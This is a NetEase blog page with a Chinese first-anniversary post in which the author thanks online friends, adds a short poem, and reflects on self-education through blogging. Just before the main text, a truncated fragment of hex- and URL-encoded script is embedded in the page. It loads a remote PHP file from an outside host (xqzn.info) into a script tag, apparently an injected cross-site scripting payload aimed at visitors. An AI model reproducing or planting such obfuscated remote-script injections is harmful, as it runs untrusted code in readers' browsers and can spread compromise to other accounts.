登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

蓝梦的博客

吸取知识传播知识让知识充实生活的每一天

 
 
 

日志

 
 
关于我

自幼与贫穷为伴,六岁开始学习针线,十岁已经承担家务大半。好不容易进了学校大门,盼到小学毕业。由于生活所迫,只好忍痛离校。又被上山下乡运动抛上了戈壁沙滩。十五年间饱偿了人间疾苦,磨灭理想,透支了健康,也燃尽了青春热能。只有学习的欲望还时隐时现。 随着返城大潮,我又回到了故乡,知识的贫乏、生活的重压、疾病的纠缠、琐事的烦恼。重新起步,谈何容易。 现在孩子虽已长大,但我依然难以摆脱困境。 可喜偏瘫了两年的我,又能行动自如了,我要把有限的时间溶入这网络的大家庭。

【原创】建博周年感言  

2009-11-10 14:30:43|  分类: 原创 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

 【原创】建博周年感言 - 蓝梦 - 蓝梦的博客

 

【原创】建博周年感言 - 蓝梦 - 蓝梦的博客 

立博客一周年,

文拥有近千篇。

围朋友一大片,

来帮助无数遍。

谢博友无私情,

谢致敬在屏前。

tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D">   时间过得可真快呀,转眼间我开博已经一年了,在这开博周年的时日,面对我的开博道白,真是心潮起伏感慨万千啊!想当初我是用多大的勇气才写下这几个字啊……记得去年九月的一天,我无意中闯入了一家博园,立刻被那美丽的画面和丰富的收藏吸引住了,我一连走访了十几家,哇!我被惊呆了,神采各异的首页设置、琳琅满目的知识收藏、热情洋溢的祝福语言……简直让我目不暇接。我惊叹原来网络中还有这样一片世外桃源。我多想加入其中啊,可我仔细一看,几乎全都是大专生和本科生,原来这里是文人墨客的出入场所,知识分子的聚集之地。我一个小学毕业生又怎么能……我怯步了。于是我把别人的博客存入收藏夹,时不时的进去逛一圈,越逛越眼馋,越逛越舍不得离开。在这博园门前我整整犹豫、观望了两个月,最后终于鼓起勇气,伸出颤抖的手指,轻按鼠标开通了我的博客,一口气写下了我的开博道白。

  博客开通后,我仍然是一头雾水,不知该干些什么。偶尔朋友送来留言画片,就欣喜若狂时时翻看爱不释手,却不知给朋友回言,也不会发图片。每次上网除了漫无目的的到网友家乱串以外,不知还能干些什么?一连多日家中依然空无一物,首页也是荒凉凄惨不成门面,每日访问量不足10人……。后来朋友们看了我的开博语开始热情起来。夸奖的、鼓励的、大包大揽要教我学习博客技术的…….真是应有尽有。在朋友的帮助下,慢慢的我学会了发送祝福语言和图片、学会了分享、学会了分类整理日志、学会了装饰博客首页……。

在这里我向所有帮助过我的朋友们致谢,是你们无私的教会了我这么多的知识,是你们让我懂得了友谊的珍贵,是你们让我感到了生活的充实。

    一年来我感受最深的是:
 1、 网络就是一个知识宝库,是学海书山,只要你想学,什么样的知识都有。只要你想看,什么样的书都有。而且是越学越觉得自己知识贫乏,网络上有着永远也学不完的知识,真的是学无止境啊!

2、  这里没有尘世间的尔虞我诈、相互倾轧,有的只是温馨的问候和热情的祝福。

3、  这里不分男女老少,也没有学历的界限,大家都能亲密无间的相互往来交流。

4、  这里可以自由的展示自己,可以自由的分享朋友的成果。

5、这里有数不清可以做老师的朋友,也不时会出现称自己为师,向自己请教的朋友。

6、博客确实是吸取知识、传播知识的平台。

总之这里无奇不有。一年来我得到了无数朋友的帮助,也对前来请教的朋友,尽其所知给与了帮助。使我深深的懂得了“三人行必有我师”的深刻含义。

如今我已有各类日志920多篇,虽说内容不是很丰富,但南来北往的朋友们在此驻足休息之时,已可翻阅浏览一阵子了。今后我一定努力,争取把博客办成知识的学习和交流平台。

到今天为止我的访问量已达3.9万多人次,收取留言将近6000条。我已与博客结下了不解之缘,今后我还要好好向大家学习。在此我再次衷心的向朋友们致敬!向所有帮助过我的朋友们致谢!!!

 

【原创】建博周年感言 - 蓝梦 - 蓝梦的博客

 

  评论这张
 
阅读(556)| 评论(81)

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018